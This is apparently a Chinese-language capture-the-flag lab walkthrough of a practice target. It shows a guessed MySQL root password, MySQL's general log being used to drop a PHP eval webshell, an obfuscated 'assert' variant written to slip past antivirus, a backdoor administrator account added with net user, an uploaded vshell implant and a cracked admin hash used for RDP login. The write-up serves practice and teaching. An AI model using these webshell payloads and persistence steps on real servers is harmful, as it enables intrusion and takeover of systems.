PT-4

flag01

首先进行信息搜集

image-20250217214739061

image-20250217214830804

密码猜测是root/cyberstrikelab

1
select @@plugin_dir

image-20250217214944891

1
show variables like 'secure%';

image-20250217215037117

发现secure_file_priv为空,说明我们没法打udf了

尝试去load_file一下

1
2
3
4
set global general_log ="ON"; #开启日志详解
set global general_log_file='C:\\www\\a.php'; #设置路径
select'<?php @eval($_POST[123]);?>';

image-20250217215516709

再次访问发现权限不允许,应该是主机有杀软给杀死了,换个路径写个免杀马

image-20250217215627050

1
2
set global general_log_file='C:\\www\\1.php';
select "<?php $a="a"."s"; $b="s"."e"."rt";$c=$a.$b;$c($_POST[123]);?>";

image-20250217221323818

C:/下拿到flag

flag02

发现权限是system,后面提示需要administrator桌面权限还得设置个性化,估计得rdp了

image-20250217221413115

rdp,咱不知道admin密码,创建一个传上去

1
2
net user Q1ngchuan 123456Aa@ /add
net localgroup administrators Q1ngchuan /add

之后上传vshell生成的马,记得管理员运行,不然还得提权

image-20250217223745650

拿到hash

1
933a9b5b44dab4530d86d83a6b47b7d1

解密发现是qwe@123

image-20250217223813778

直接rdp administrator/qwe@123

右键桌面->个性化,背景选择“幻灯片放映”即可

image-20250217223145824